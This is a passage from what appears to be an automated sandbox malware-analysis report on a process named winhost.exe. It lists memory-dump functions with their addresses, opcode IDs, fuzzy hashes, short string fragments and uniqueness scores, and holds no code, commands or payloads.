                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebc30f54d3712ce8e24f301271419b6199145c10c78e88bd570eef829a17e5cb
                                            • Instruction ID: 34b1830a8c05cb75f890e70792d349ca091218b6bcb5df65bfbf5a6d29d7e158
                                            • Opcode Fuzzy Hash: ebc30f54d3712ce8e24f301271419b6199145c10c78e88bd570eef829a17e5cb
                                            • Instruction Fuzzy Hash: B801AF31A0CB8D4FEB56972C98513A53BA2EB8B348F1482EBE44DCB193CD259D05C362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB047D, Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d232a7c29bff9accca9444f73db8c2a38dfa2989f0ad3bc26bdbdf03a45d1a6
                                            • Instruction ID: 2e9259189b07b999e216de6b3b0ef96be63dd80d2b55f5f808b7a980fe8b0c0f
                                            • Opcode Fuzzy Hash: 8d232a7c29bff9accca9444f73db8c2a38dfa2989f0ad3bc26bdbdf03a45d1a6
                                            • Instruction Fuzzy Hash: 72F0271150C3894FFB1697744C993E23F428B56310F0980FAE80C8F1D7CA9D05448363
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB236B, Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fe73b3c10d80ecd22d368c8ba405954c6c84ef59e32a57e338bfae717cd82a3
                                            • Instruction ID: 4cb647b10055c55c40e1535a66195c61c4c47a052dc489c08e04cc9c0656ab23
                                            • Opcode Fuzzy Hash: 6fe73b3c10d80ecd22d368c8ba405954c6c84ef59e32a57e338bfae717cd82a3
                                            • Instruction Fuzzy Hash: A0F0AF6192868E8FDBB4DF1C88913E837D1EF49740F548076E80DCB181DE36A9449791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB9135, Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38e5bb9c703ed23310c80c5171f735171967bc43ce220696261fae427ecc8581
                                            • Instruction ID: e7cb87bc309798c01d688dc27861d5b06c8e85cfb25921ade7db2d7ad3a3875d
                                            • Opcode Fuzzy Hash: 38e5bb9c703ed23310c80c5171f735171967bc43ce220696261fae427ecc8581
                                            • Instruction Fuzzy Hash: 52F02062A0CB460FE362532C0E493726BA0DF8B221F0600FBE41CC72C3EC0D5C0493A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB02FD, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 366c5c03d2324f440c10eb38568bc0f1780371e145f66f6ed11d5cb736a5d913
                                            • Instruction ID: c655f82f7bebf572f1f2a271ec5c4d1ab22155f6251d2022f1f72a81e0f7f72b
                                            • Opcode Fuzzy Hash: 366c5c03d2324f440c10eb38568bc0f1780371e145f66f6ed11d5cb736a5d913
                                            • Instruction Fuzzy Hash: 95E082A280EB890FE307933089223103F609F07210F8A00EAC04CCF0E3E9091E8AC322
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FB0F61, Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88fa22f6b774a0180e857ca646f511ef188fe528a0c5176ae584d824603890fd
                                            • Instruction ID: f04b78bb359b5a4cfbc32e7054b952d8e9294b409330c96e2bdbf22b7ea7de05
                                            • Opcode Fuzzy Hash: 88fa22f6b774a0180e857ca646f511ef188fe528a0c5176ae584d824603890fd
                                            • Instruction Fuzzy Hash: DDD05E0085E2C50FC70293748C1A4957FF59E47110B4FC1F5D089CF053E40D45058362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00007FFA35FBEE3E, Relevance: .5, Instructions: 455COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.718103796.00007FFA35FB0000.00000040.00000001.sdmp, Offset: 00007FFA35FB0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8bc22e39b4415b0b758871a26ed60a70c41d8e63b39c9d1045f5f1dc4ce636eb
                                            • Instruction ID: b480412b7b42104165617e9da393f98695b7d1e1bc9f93a2114966d19a22bc45
                                            • Opcode Fuzzy Hash: 8bc22e39b4415b0b758871a26ed60a70c41d8e63b39c9d1045f5f1dc4ce636eb
                                            • Instruction Fuzzy Hash: 5312D76440E3C25FD3579BB48869991BFB29F07611F4F80DAD0C5CF073EA59894ACBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: winhost.exe PID: 4112 Parent PID: 6336 winhost.exeCOMMON

                                            Executed Functions

                                            Function 00007FFA35FC0588, Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: s5$ s5$ s5$8.5
                                            • API String ID: 0-2748289946
                                            • Opcode ID: 60ce8e8867fbeb2e49e1502ce55e88b4e9d269c55fad71a13909fb8114edbaba
                                            • Instruction ID: f4ce650c13bc792d073ab0c4fb7486ae5be856ce6b366350806d53d10028b7f5
                                            • Opcode Fuzzy Hash: 60ce8e8867fbeb2e49e1502ce55e88b4e9d269c55fad71a13909fb8114edbaba
                                            • Instruction Fuzzy Hash: E661A430A18A4E8FEB98EF1C84597B937D4FF5A700F5484B9E40EC7192CE39A806DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC094E, Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: h|5$|5
                                            • API String ID: 0-2177373217
                                            • Opcode ID: 8d73e20dbd6b83f1d3dd047e73c6d36f089ed5ce5b90e38cb67952b3e2ccc83f
                                            • Instruction ID: 401b78b84df9e9eb2d7384a683ea2017f9737f9fac444f1fd27d75a8d474f429
                                            • Opcode Fuzzy Hash: 8d73e20dbd6b83f1d3dd047e73c6d36f089ed5ce5b90e38cb67952b3e2ccc83f
                                            • Instruction Fuzzy Hash: ACF13A21A0DB8A4FE3A6E73C88A56A97FE1EF5B740F5480FAD08DCB197CD146809C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC14D0, Relevance: 2.1, Strings: 1, Instructions: 870COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: X|5
                                            • API String ID: 0-721148514
                                            • Opcode ID: 793bcfe15ea31f7c9be5708300bd4e876821cbb53583b868cb369c76835d3d6d
                                            • Instruction ID: 2bdd6bd2854c1eebc6049bb621fcfb437c07875dcac638e934301ac31b2f5145
                                            • Opcode Fuzzy Hash: 793bcfe15ea31f7c9be5708300bd4e876821cbb53583b868cb369c76835d3d6d
                                            • Instruction Fuzzy Hash: 2E52D620A0CA8B4FEB69AB3C98957F937D1EF4B740F5480B9E44ECB1C7DD29A8059710
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC0360, Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: 0a13510ae3701f0d85ff3506a35421dcb60e01110b823e9e07e8fc251f38e106
                                            • Instruction ID: 5a7468256ca8fd31498191503b1114b484c1cec32479826e0e32b2cbab33d084
                                            • Opcode Fuzzy Hash: 0a13510ae3701f0d85ff3506a35421dcb60e01110b823e9e07e8fc251f38e106
                                            • Instruction Fuzzy Hash: 8E416030A19A498FDF94EB3CC456A69B7E1FF5A314B5484FCE40ECB292DE28E901C741
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC678E, Relevance: .3, Instructions: 296COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef30705f4f9ed5a64a96c563d7127c22dce60bf8a92f694133598cd7f5cdd5c7
                                            • Instruction ID: 491fa959b0120635f2893f8c4dfaf7ba4e998f981989a460bed0150e5d73ed8a
                                            • Opcode Fuzzy Hash: ef30705f4f9ed5a64a96c563d7127c22dce60bf8a92f694133598cd7f5cdd5c7
                                            • Instruction Fuzzy Hash: 26A11870518A8D8FEBA4EF18C859AE97BE0FF5A704F408179E80DC7292DF359845CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC84A9, Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c5d661671f551edeff97421dc6efabc371a49c1746e1ea7022cf1c0be79f971
                                            • Instruction ID: b3f81470f16b8216945e4aa5df5ac6c93528f80c3f4261981abbf5afc4aa3cca
                                            • Opcode Fuzzy Hash: 0c5d661671f551edeff97421dc6efabc371a49c1746e1ea7022cf1c0be79f971
                                            • Instruction Fuzzy Hash: 2A812B2061CB890FE7599B2C98117A93BD1EF4B700F9480FAF44DCB2D3DE29AC059355
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC7899, Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba3207169a8f1b1b1198cfb95d218afa216d0d6bbfc251ae6142421e7e559f50
                                            • Instruction ID: bfaa3ab2cf714e1a7d71636ee68619c55add5bc2cc838b29a7a6aea5598768d4
                                            • Opcode Fuzzy Hash: ba3207169a8f1b1b1198cfb95d218afa216d0d6bbfc251ae6142421e7e559f50
                                            • Instruction Fuzzy Hash: 9D913D70518A4D9FEBA4EF18C899BE93BE0FF5A354F944179E80DC7292DE359884CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC2851, Relevance: .3, Instructions: 263COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69cce95e7d353f8a9b0de09e60f2516cb7d4348e6ec6e2a4db74282ebffce599
                                            • Instruction ID: 095a08d293c5f699186b913f6fc8ef6a8329e8189dc20e6b06e213b4622e238f
                                            • Opcode Fuzzy Hash: 69cce95e7d353f8a9b0de09e60f2516cb7d4348e6ec6e2a4db74282ebffce599
                                            • Instruction Fuzzy Hash: 89816D70518A4D8FDBA8EF18DC86BE937E1FB59300F50816AE84DCB252DF35AA45CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC20F9, Relevance: .2, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8205cb659656b9a579ad1b128ead1ff700b213b9c85b7be3d1e4229664c6e9c6
                                            • Instruction ID: 1183e065c26d62afcaa72f8b15c44ff51a801afd1e21b104770584e06b25dd38
                                            • Opcode Fuzzy Hash: 8205cb659656b9a579ad1b128ead1ff700b213b9c85b7be3d1e4229664c6e9c6
                                            • Instruction Fuzzy Hash: D091E870918A8E8FEBA4DF28C8857E93BE0FF1A740F504075E84DC7292DE35A985DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC1158, Relevance: .2, Instructions: 244COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae8c04cec47abae1615371993378d96e52a5fa22e5f13dab73fa7743e028b42d
                                            • Instruction ID: 72c47034ac49518032b6a334eca879642c65dcbaba8657add18f023b61ee1be2
                                            • Opcode Fuzzy Hash: ae8c04cec47abae1615371993378d96e52a5fa22e5f13dab73fa7743e028b42d
                                            • Instruction Fuzzy Hash: F571ED30718A494FEB95EB2C889977D77E2EFDA300F5981B5E00DC729ACF6898458742
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC97A5, Relevance: .2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd5e78140dfb3163fb2cbb94fcd2ec0d2999383d2f489f933d9e6eba6b739a24
                                            • Instruction ID: 1612014ad35d3da41143930026e4b48f16af68679fed4aca0040af0a4e26a57a
                                            • Opcode Fuzzy Hash: cd5e78140dfb3163fb2cbb94fcd2ec0d2999383d2f489f933d9e6eba6b739a24
                                            • Instruction Fuzzy Hash: EB51D760A0CB8A4FEB55AB3848557B97BE1EF4B700F5481FEE44EC71D3DE29A8019351
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC3789, Relevance: .2, Instructions: 184COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b13fbae0656309a442da06b5917e8210c2cb36e84b4710db6175a3e1b58bfd69
                                            • Instruction ID: b9fd0277896d7637a9addef8d4017759f497cc49daa3adf51c779b8a87a8ca88
                                            • Opcode Fuzzy Hash: b13fbae0656309a442da06b5917e8210c2cb36e84b4710db6175a3e1b58bfd69
                                            • Instruction Fuzzy Hash: C1519371518B8D8FDBA4DF18C885BE97BE1FB19310F50816AE44DC7292DF34A649CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8970, Relevance: .2, Instructions: 182COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9549c210688e0e7d8dbb1b3c98b2406040bfdafdc13a5e1dd609aeec59d05138
                                            • Instruction ID: 5b6373a14d52c154dbb4789b0f33c756aeb9ff44fea9bd7f9a1bbe6375cad454
                                            • Opcode Fuzzy Hash: 9549c210688e0e7d8dbb1b3c98b2406040bfdafdc13a5e1dd609aeec59d05138
                                            • Instruction Fuzzy Hash: 7251CE61A0CB8A4FE796E72C48557657BE1EF5B300F5880FAE44DCB2A3DD289C458352
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC7D56, Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eac0a0cff4ec9c034c089efdc3464295884ad6b9b8d8a024b5de610640b64479
                                            • Instruction ID: b950825caef9296b786ab2d11d806a0420bce9a26efe7a04f6d8d6e388c4610b
                                            • Opcode Fuzzy Hash: eac0a0cff4ec9c034c089efdc3464295884ad6b9b8d8a024b5de610640b64479
                                            • Instruction Fuzzy Hash: A2519FA1A0DB8A4FEB969B2C88957A97FE1EF1B340F5444FAD44DCB193DE289C04C351
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC2B7A, Relevance: .2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ed811cd40ef1f3f16830b3226dd9cf6d23f4ff13cf90d10c36a909644720fa0
                                            • Instruction ID: ac56f44313d63baf1987f14346bee08c7d8a22b3449e022ea8928b7d0f91cba5
                                            • Opcode Fuzzy Hash: 9ed811cd40ef1f3f16830b3226dd9cf6d23f4ff13cf90d10c36a909644720fa0
                                            • Instruction Fuzzy Hash: D141A210B58B8A2FEB96F77888997A97BD2EF5B300F4580F5D44DC72A3DD28A8018751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35E7A009, Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.725854930.00007FFA35E7A000.00000040.00000001.sdmp, Offset: 00007FFA35E7A000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4586f1c1e8d6565c02e6145e8e48057d9a14ded3bebcc7e765e9408905a261b9
                                            • Instruction ID: 5264c2298515b99543ffe6f26ba9b486b1dfa33a6df512b2538b5fe07a974813
                                            • Opcode Fuzzy Hash: 4586f1c1e8d6565c02e6145e8e48057d9a14ded3bebcc7e765e9408905a261b9
                                            • Instruction Fuzzy Hash: 5B41017140CB859FE7668F289C46A627FF0EF52320F1605DFD488CB1A3E725A845C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8C6E, Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad8b35157a961ee7fc82ac2fcaae00aab4e8de718a35c4d0f9a5f26faa25cc7b
                                            • Instruction ID: 347e0979f7e1b462b3f35a03a5dd26147cef76d3e128ba9127c75ecc8e5e598b
                                            • Opcode Fuzzy Hash: ad8b35157a961ee7fc82ac2fcaae00aab4e8de718a35c4d0f9a5f26faa25cc7b
                                            • Instruction Fuzzy Hash: 2C31242090CA8F4FE765AB2888456B97BE0EF57710F0485BAE44EC7097DE39A800C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8121, Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15e5f88b0bcbd256fa6d47d41d50f18e64db58d181774b7d3a4856b71c97c9cb
                                            • Instruction ID: caa5928472801daaa6c11b5f4761863717cf44cc7609177925fe3d18512bd344
                                            • Opcode Fuzzy Hash: 15e5f88b0bcbd256fa6d47d41d50f18e64db58d181774b7d3a4856b71c97c9cb
                                            • Instruction Fuzzy Hash: C931DB71B1CB4A4FE7549B2C48456B93BE1FF5A711F44807AF40EC7293DE299C058791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8B16, Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ac44b641a345b023fd640823e5134cd2e344deb840b16e40da759a2991d049e
                                            • Instruction ID: ae58919f8d403169f93608477f5e12add0d5affd329b0751e0c2c1dedbf54ac2
                                            • Opcode Fuzzy Hash: 7ac44b641a345b023fd640823e5134cd2e344deb840b16e40da759a2991d049e
                                            • Instruction Fuzzy Hash: B831A260708F4A8FDBA5EB2C88997B837E1EF6E701B5540BAD04DC7253CE24AC458782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC9108, Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d066a5573249e61776f38c1816d2e70409dc8e86e8ed4d6f10f4a01c7ad480ae
                                            • Instruction ID: 62ac77a98a51d92caab99e17e933a7505ace44be66d5519e0f31617f1a4530cc
                                            • Opcode Fuzzy Hash: d066a5573249e61776f38c1816d2e70409dc8e86e8ed4d6f10f4a01c7ad480ae
                                            • Instruction Fuzzy Hash: 4A31C420A1D68E4FEB59D72C89507783BE1EF47200FA481FAE44ECB1D3CD28A841D711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8EC9, Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae228cdfe8c4fed753b97898c8e485ca39455ca6d0fe810b46f1436d9d44f2cc
                                            • Instruction ID: a86a0ea9c6b08b2edbe5cca81891b5d34e3d37e05a377dae2c0cf1562127db31
                                            • Opcode Fuzzy Hash: ae228cdfe8c4fed753b97898c8e485ca39455ca6d0fe810b46f1436d9d44f2cc
                                            • Instruction Fuzzy Hash: D631F52160CB8A5FE756DB2888517A5BFE1EF4B300F5481F6E48DCB193DF28A845C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC2709, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d84b7101e8475d524717e3b7e4981f509be393d73abce1a1f8bed9ac4c9affdb
                                            • Instruction ID: ffc2d5616b85a0de4bda3b2517777f745b6c13adfe260e19d679b1a95572aefb
                                            • Opcode Fuzzy Hash: d84b7101e8475d524717e3b7e4981f509be393d73abce1a1f8bed9ac4c9affdb
                                            • Instruction Fuzzy Hash: 643149B1418A8D8FDB81DF28C894BEA7BE0FF19344F5142AAE84DC7191DB349648CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC7F7D, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9649b817b8eb688b8ffe9bf1ac9dff1e5db991b78c9432935d1ee99b5800a566
                                            • Instruction ID: 6ceb3d4b4bc52e9158211f12122b3c601e76077c4adc01c5139322a969101b66
                                            • Opcode Fuzzy Hash: 9649b817b8eb688b8ffe9bf1ac9dff1e5db991b78c9432935d1ee99b5800a566
                                            • Instruction Fuzzy Hash: C631716590E7C50FE747873848696217FB1AF07254B4E80EAD08CCF1A3EA199C49C762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC960D, Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5e645ffe13ccad77cd68734d3fdf45d0b58d0676e6c1fc1178f57baccc9281a
                                            • Instruction ID: d4ecc7750ba048f9efaf342e014d7dc9e3fdfbd56c6958d9a73cf080723a3b7b
                                            • Opcode Fuzzy Hash: f5e645ffe13ccad77cd68734d3fdf45d0b58d0676e6c1fc1178f57baccc9281a
                                            • Instruction Fuzzy Hash: 38216D6061860E4FDB58EF2888916BA77A1FF46300F44C0B9E80ECB1C6DE28E801DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC9AD9, Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e2e22d5b6a79bd037dabc3d519c18d0194d5dced13d994797510c33395ad0b5
                                            • Instruction ID: 9f7a987aa6330761c73a391d38169dddbd1b4c61beca80153281ce9155f95a98
                                            • Opcode Fuzzy Hash: 5e2e22d5b6a79bd037dabc3d519c18d0194d5dced13d994797510c33395ad0b5
                                            • Instruction Fuzzy Hash: DB21BF6140E7C66ED7539B3888159E17FE0AF0B660F4D84EED4CDCB093DE1A9609CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC00BC, Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c5293954e2a7387c531657d7e59754ccebba50c51d7dd77d75b168860ba1a78a
                                            • Instruction ID: 7b0d67df9e7a7d523b137731cd14b853dc732429274d5da01c492a30c972f486
                                            • Opcode Fuzzy Hash: c5293954e2a7387c531657d7e59754ccebba50c51d7dd77d75b168860ba1a78a
                                            • Instruction Fuzzy Hash: 6401807182C38F9FE7429F24C8115BA3BA0FF07740F0486B2F88DC6092EE28AA149751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC9379, Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bec034e573cda14f26b39e0bd9d4742965c17c9ef41642245fd4f34b184343c
                                            • Instruction ID: a5b23a7505497742a3d2a6db177d6d35570355587bd218e5d88dd64f14beb24d
                                            • Opcode Fuzzy Hash: 6bec034e573cda14f26b39e0bd9d4742965c17c9ef41642245fd4f34b184343c
                                            • Instruction Fuzzy Hash: 9811C024A0C78A1FEB56872898413A13BB1EF9B754F5581F7E04DCB1D3DE1969068362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8049, Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
